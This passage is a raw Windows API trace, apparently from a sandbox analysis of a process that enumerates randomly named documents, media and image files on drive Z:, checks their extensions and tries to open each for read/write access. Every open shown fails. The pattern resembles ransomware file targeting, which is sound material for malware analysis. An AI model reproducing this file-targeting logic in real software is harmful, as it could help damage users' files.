ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2cHgIoncB.wav", cAlternateFileName="")) returned 1 [0176.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.288] PathFindExtensionW (pszPath="Z:\\2cHgIoncB.wav") returned=".wav" [0176.293] CreateFileW (lpFileName="Z:\\2cHgIoncB.wav" (normalized: "z:\\2chgioncb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.295] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15b5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BrKxpbhKKRTpU.docx", cAlternateFileName="")) returned 1 [0176.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.295] PathFindExtensionW (pszPath="Z:\\BrKxpbhKKRTpU.docx") returned=".docx" [0176.301] CreateFileW (lpFileName="Z:\\BrKxpbhKKRTpU.docx" (normalized: "z:\\brkxpbhkkrtpu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.302] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14c86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8AEDnDa.avi", cAlternateFileName="")) returned 1 [0176.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.303] PathFindExtensionW (pszPath="Z:\\8AEDnDa.avi") returned=".avi" [0176.308] CreateFileW (lpFileName="Z:\\8AEDnDa.avi" (normalized: "z:\\8aednda.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.310] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fmkPuhgsIQDpQcV3y.ppt", cAlternateFileName="")) returned 1 [0176.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.311] PathFindExtensionW (pszPath="Z:\\fmkPuhgsIQDpQcV3y.ppt") returned=".ppt" [0176.316] CreateFileW (lpFileName="Z:\\fmkPuhgsIQDpQcV3y.ppt" (normalized: "z:\\fmkpuhgsiqdpqcv3y.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.318] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oul9aMfiTm6Pt28KJ.xls", cAlternateFileName="")) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.318] PathFindExtensionW (pszPath="Z:\\Oul9aMfiTm6Pt28KJ.xls") returned=".xls" [0176.324] CreateFileW (lpFileName="Z:\\Oul9aMfiTm6Pt28KJ.xls" (normalized: "z:\\oul9amfitm6pt28kj.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.325] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdbHKY8ircatAsd.mp3", cAlternateFileName="")) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.326] PathFindExtensionW (pszPath="Z:\\cdbHKY8ircatAsd.mp3") returned=".mp3" [0176.331] CreateFileW (lpFileName="Z:\\cdbHKY8ircatAsd.mp3" (normalized: "z:\\cdbhky8ircatasd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.333] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5a54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EInIzXIEURKe2P.odt", cAlternateFileName="")) returned 1 [0176.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.333] PathFindExtensionW (pszPath="Z:\\EInIzXIEURKe2P.odt") returned=".odt" [0176.339] CreateFileW (lpFileName="Z:\\EInIzXIEURKe2P.odt" (normalized: "z:\\einizxieurke2p.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.341] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WDBM7MBYaR.mp3", cAlternateFileName="")) returned 1 [0176.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.341] PathFindExtensionW (pszPath="Z:\\WDBM7MBYaR.mp3") returned=".mp3" [0176.347] CreateFileW (lpFileName="Z:\\WDBM7MBYaR.mp3" (normalized: "z:\\wdbm7mbyar.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.353] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6tY3yjB6Dh6qgWl.odp", cAlternateFileName="")) returned 1 [0176.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.353] PathFindExtensionW (pszPath="Z:\\s6tY3yjB6Dh6qgWl.odp") returned=".odp" [0176.359] CreateFileW (lpFileName="Z:\\s6tY3yjB6Dh6qgWl.odp" (normalized: "z:\\s6ty3yjb6dh6qgwl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.360] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17be7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UrfjPtip.xlsx", cAlternateFileName="")) returned 1 [0176.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.361] PathFindExtensionW (pszPath="Z:\\UrfjPtip.xlsx") returned=".xlsx" [0176.367] CreateFileW (lpFileName="Z:\\UrfjPtip.xlsx" (normalized: "z:\\urfjptip.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.369] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbcf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qllIIB4PUCq.m4a", cAlternateFileName="")) returned 1 [0176.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.369] PathFindExtensionW (pszPath="Z:\\qllIIB4PUCq.m4a") returned=".m4a" [0176.375] CreateFileW (lpFileName="Z:\\qllIIB4PUCq.m4a" (normalized: "z:\\qlliib4pucq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.377] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd729, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ry23qi7rroS58F.m4a", cAlternateFileName="")) returned 1 [0176.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.377] PathFindExtensionW (pszPath="Z:\\ry23qi7rroS58F.m4a") returned=".m4a" [0176.383] CreateFileW (lpFileName="Z:\\ry23qi7rroS58F.m4a" (normalized: "z:\\ry23qi7rros58f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.385] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zl76M0AJ2xe.ppt", cAlternateFileName="")) returned 1 [0176.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.385] PathFindExtensionW (pszPath="Z:\\zl76M0AJ2xe.ppt") returned=".ppt" [0176.390] CreateFileW (lpFileName="Z:\\zl76M0AJ2xe.ppt" (normalized: "z:\\zl76m0aj2xe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.393] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kiZ0JG9WrlZl.ppt", cAlternateFileName="")) returned 1 [0176.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.393] PathFindExtensionW (pszPath="Z:\\kiZ0JG9WrlZl.ppt") returned=".ppt" [0176.398] CreateFileW (lpFileName="Z:\\kiZ0JG9WrlZl.ppt" (normalized: "z:\\kiz0jg9wrlzl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.400] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="byUWhwwpU4G7YhqN.png", cAlternateFileName="")) returned 1 [0176.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.400] PathFindExtensionW (pszPath="Z:\\byUWhwwpU4G7YhqN.png") returned=".png" [0176.406] CreateFileW (lpFileName="Z:\\byUWhwwpU4G7YhqN.png" (normalized: "z:\\byuwhwwpu4g7yhqn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.409] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13665, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3lJ1cmsj7wnHDKlL1.xls", cAlternateFileName="")) returned 1 [0176.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.409] PathFindExtensionW (pszPath="Z:\\3lJ1cmsj7wnHDKlL1.xls") returned=".xls" [0176.414] CreateFileW (lpFileName="Z:\\3lJ1cmsj7wnHDKlL1.xls" (normalized: "z:\\3lj1cmsj7wnhdkll1.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.416] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7fbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2BmDJ.odp", cAlternateFileName="")) returned 1 [0176.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.416] PathFindExtensionW (pszPath="Z:\\U2BmDJ.odp") returned=".odp" [0176.421] CreateFileW (lpFileName="Z:\\U2BmDJ.odp" (normalized: "z:\\u2bmdj.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.424] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd501, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P3XntTjRFtRk.png", cAlternateFileName="")) returned 1 [0176.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.424] PathFindExtensionW (pszPath="Z:\\P3XntTjRFtRk.png") returned=".png" [0176.429] CreateFileW (lpFileName="Z:\\P3XntTjRFtRk.png" (normalized: "z:\\p3xnttjrftrk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.431] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x58a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D2y4L1elku1D.pps", cAlternateFileName="")) returned 1 [0176.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.431] PathFindExtensionW (pszPath="Z:\\D2y4L1elku1D.pps") returned=".pps" [0176.437] CreateFileW (lpFileName="Z:\\D2y4L1elku1D.pps" (normalized: "z:\\d2y4l1elku1d.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.440] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14a5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bbqSpo4X5l6kKSSGQegr.jpg", cAlternateFileName="")) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.440] PathFindExtensionW (pszPath="Z:\\bbqSpo4X5l6kKSSGQegr.jpg") returned=".jpg" [0176.446] CreateFileW (lpFileName="Z:\\bbqSpo4X5l6kKSSGQegr.jpg" (normalized: "z:\\bbqspo4x5l6kkssgqegr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.447] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13305, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TqvR2yMTxIsft9J01h3.m4a", cAlternateFileName="")) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.448] PathFindExtensionW (pszPath="Z:\\TqvR2yMTxIsft9J01h3.m4a") returned=".m4a" [0176.453] CreateFileW (lpFileName="Z:\\TqvR2yMTxIsft9J01h3.m4a" (normalized: "z:\\tqvr2ymtxisft9j01h3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.454] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LtLIcHIqo8.wav", cAlternateFileName="")) returned 1 [0176.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.456] PathFindExtensionW (pszPath="Z:\\LtLIcHIqo8.wav") returned=".wav" [0176.460] CreateFileW (lpFileName="Z:\\LtLIcHIqo8.wav" (normalized: "z:\\ltlichiqo8.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, 